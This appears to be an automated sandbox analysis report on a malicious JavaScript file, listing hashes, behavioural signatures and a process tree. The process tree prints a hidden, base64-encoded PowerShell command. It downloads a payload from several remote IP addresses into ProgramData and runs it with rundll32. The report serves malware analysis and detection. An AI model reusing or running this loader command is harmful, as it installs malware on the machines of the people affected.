Analysis
-
max time kernel
26s -
max time network
29s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16-05-2023 13:28
Static task
static1
Behavioral task
behavioral1
Sample
Lnlmlmmw.js
Resource
win7-20230220-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Lnlmlmmw.js
Resource
win10v2004-20230220-en
windows10-2004-x64
5 signatures
150 seconds
General
-
Target
Lnlmlmmw.js
-
Size
240KB
-
MD5
1d3ff4ed747331b584e92a5d57b6acd8
-
SHA1
333ec83e9242cf227a0d6f3455375d01bc50cf40
-
SHA256
8c2d1d7b94ee68e286b5d3c8f5df99c4d5ad0ed08267cfbcda66cab20bcd8927
-
SHA512
056b6bca475eeec780c9c94bf2e0271bbaeb5af03d69aa1c0fb3b02413334fcab7c61f6147e8193ebf08a4452d8be0b20da50250a7848a4bebfb3922f4edd2a3
-
SSDEEP
1536:mDY/NRvg4paakXIR0xlXfewOaPLfWy46hUHx+zIt5483CCpRhsW+F22SOtcgZaXA:H/NRvg4HOlX2wOjjlNLt8Gmj
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1620 wrote to memory of 1468 1620 wscript.exe 26 PID 1620 wrote to memory of 1468 1620 wscript.exe 26 PID 1620 wrote to memory of 1468 1620 wscript.exe 26 PID 1468 wrote to memory of 1776 1468 wscript.exe 27 PID 1468 wrote to memory of 1776 1468 wscript.exe 27 PID 1468 wrote to memory of 1776 1468 wscript.exe 27
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Lnlmlmmw.js1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Lnlmlmmw.js" dyspnoealColonialness Alstonine Pickery Shopkeeperism2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAByAGEAZABpAG8AYwBhAHIAYgBvAG4AUgBlAGwAaQB0AGkAZwBhAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBNAGcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQAxAEEARABjAEEATwBpAFQAVABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGsAQQBMAGcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQQA9AD0ATwBpAFQAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADMAQQBEAEEAQQBMAGcAQQB5AEEARABNAEEATQB3AEEAPQBPAGkAVABUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAEwAZwBBADAAQQBEAGcAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJABlAHAAaQBsAG8AZwB1AGUAcwBJAG4AdgBhAGcAaQBuAGEAYgBsAGUAIAA9ACAANQA2ADUAOwAkAFMAbQBhAGMAawBmAHUAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcASQBBAGIAdwBCAHUAQQBHAEUAQQBaAHcAQgBvAEEARQBJAEEAYwBnAEIAMQBBAEcAdwBBAGUAUQBCAHAAQQBHAFUAQQBjAHcAQQB1AEEARwBjAEEAWQBRAEIAcwBBAEcAdwBBAFoAUQBCAHkAQQBIAGsAQQByAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWgBBAEIAdgBBAEgASQBBAGMAdwBCAGwAQQBHADAAQQBaAFEAQgB1AEEASABRAEEAVgBBAEIAaABBAEgASQBBAGIAZwBCAHAAQQBIAE0AQQBhAEEAQgBsAEEASABJAEEATABnAEIAaABBAEcAdwBBACIAOwAkAEEAcgBjAHUAbABpAHQAZQBCAHIAYQBjAG8AbgBpAGQAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAZwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHgAdgBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBAHoAQQBDADQAQQBOAFEAQQB4AEEAQwA0AEEATgBBAEEAegBBAEMANABBAE4AZwBBADUAQQBBAD0APQB4AHYAbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAGcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB6AEEARABBAEEAIgA7ACQAZgBlAG4AdABhAG4AeQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABjAEEATABnAEEANQBBAEQARQBBAEwAZwBBADQAQQBEAFkAQQBMAGcAQQB4AEEARABJAEEATQBnAEEAdgBBAEYAWQBBAGIAQQBCAHcAQQBGAFEAQQBMAHcAQgB4AEEARABrAEEATwBBAEIAQwBBAEYAawBBAGIAZwBBADAAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADUAQQBDADgAQQBkAEEAQgBPAEEARwBZAEEATAB3AEIAUgBBAEUAawBBAFYAUQBCAG8AQQBIAG8AQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABsAGEAZABsAGUAdwBvAG8AZAAgAGkAbgAgACQAZgBlAG4AdABhAG4AeQBsACAALQBzAHAAbABpAHQAIAAiAGQAIgApACAAewAkAGUAeABvAGcAYQBzAHQAcgBpAGMAVAByAGkAcwBlAGMAdABlAGQAIAA9ACAAIgBhAG4AbgBvAHkAaQBuAGcAbAB5ACIAOwAkAE0AZQByAGUAdAByAGkAYwBlAHMAUwBlAHYAZQByAGkAdABpAGUAcwAgAD0AIAA5ADYANwA7ACQASwBlAHIAYQB0AGkAdABpAHMAVwBhAHIAdwBpAGMAawAgAD0AIAA1ADYAOAA7AHQAcgB5ACAAewAkAEEAZgBmAGwAYQB0AGUAIAA9ACAAIgBwAGEAbgBkAGEAbgBpACIAOwAkAFYAZQByAGUAYwB1AG4AZABuAGUAcwBzAFkAYQByAGQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAYwBBAEIAMABBAEcAOABBAGIAUQBCAGwAQQBHADQAQQBhAFEAQgB1AEEARwBjAEEAYQBRAEIAMABBAEcAawBBAGMAdwBCAFUAQQBHAGcAQQBjAGcAQgBsAEEARwBVAEEAWgBBAEIAcABBAEcAMABBAFoAUQBCAHUAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEcAawBBAGQAQQBCADUAQQBDADQAQQBiAHcAQgB5AEEARwBjAEEAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAHMAQQBaAFEAQgAzAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgB1AEEAQQA9AD0AZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABFAEEATQBBAEEAeABBAEMANABBAE0AZwBBAHcAQQBEAEkAQQBMAGcAQQB4AEEARABZAEEATwBBAEEAPQAiADsAJABVAG4AYwBvAGwAbwByAGEAYgBsAHkATQBlAGwAYQBuAGkAYwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGwAYQBkAGwAZQB3AG8AbwBkACkAKQA7AGkAdwByACAAJABVAG4AYwBvAGwAbwByAGEAYgBsAHkATQBlAGwAYQBuAGkAYwBzACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBvAG0AZQB3AGEAeQAuAGgAZQBwAHQAYQBnAHkAbgBvAHUAcwBQAHIAZQBvAGIAdgBpAG8AdQBzAG4AZQBzAHMAOwAkAGYAZQB0AG8AcABsAGEAYwBlAG4AdABhAGwAIAA9ACAAIgBEAGUAbgBpAHoAYQB0AGkAbwBuACIAOwAkAFQAeQBwAG8AdABoAGUAcgBlAFMAZQByAHUAbQBhAGwAIAA9ACAAIgBHAGEAcwB0AHIAbwBkAGkAYQBsAHkAcwBpAHMAUwB1AGIAcwB1AHIAZQB0AHkAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAG8AbQBlAHcAYQB5AC4AaABlAHAAdABhAGcAeQBuAG8AdQBzAFAAcgBlAG8AYgB2AGkAbwB1AHMAbgBlAHMAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANgA5ADAANwAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEIAMwBBAEcARQBBAGUAUQBBAHUAQQBHAGcAQQBaAFEAQgB3AEEASABRAEEAWQBRAEIAbgBBAEgAawBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQgBRAEEASABJAEEAWgBRAEIAdgBBAEcASQBBAGQAZwBCAHAAQQBHADgAQQBkAFEAQgB6AEEARwA0AEEAWgBRAEIAegBBAEgATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABPAHYAZQByAGMAcgBlAGQAaQB0AEsAZQBlAHAAZQByAGkAbgBnACAAPQAgACIAUwBpAG0AaQBhAG4AaQB0AHkAIgA7AGIAcgBlAGEAawA7AFYAdQBlAEoAUwA7AH0AVgB1AGUASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABIAGUAbABiAGUAaAAgAD0AIAAiAGQAaQBhAGIAYQBzAGUAcwBMAGEAdABlAHIAYQBsAGkAegBlAGQAIgA7ACQASABhAG4AZABzAHAAYQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE4AdwBBAHoAQQBDADQAQQBOAEEAQQAxAEEAQQA9AD0AIgA7ACQAQwBhAG4AdABhAHQAaQBvAG4AIAA9ACAAMwA4ADkAOwB9AH0AJABuAG8AbgBkAGUAZgBlAG4AZABhAG4AdABUAGEAcABlAHMAdABlAHIAIAA9ACAAIgBRAHUAZQBlAG4AcgBvAG8AdABGAHUAbgBuAGUAbABsAGkAbgBnACIAOwAkAFMAZQBtAGkAcwB0AGEAdABlACAAPQAgACIAYQByAHQAaAByAG8AcABvAGQAeQBJAG4AdABlAG4AcwBpAG8AbgBhAGwAIgA7ACQASQBuAHcAYQBsAGwAaQBuAGcAIAA9ACAAOQAxADEAOwA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-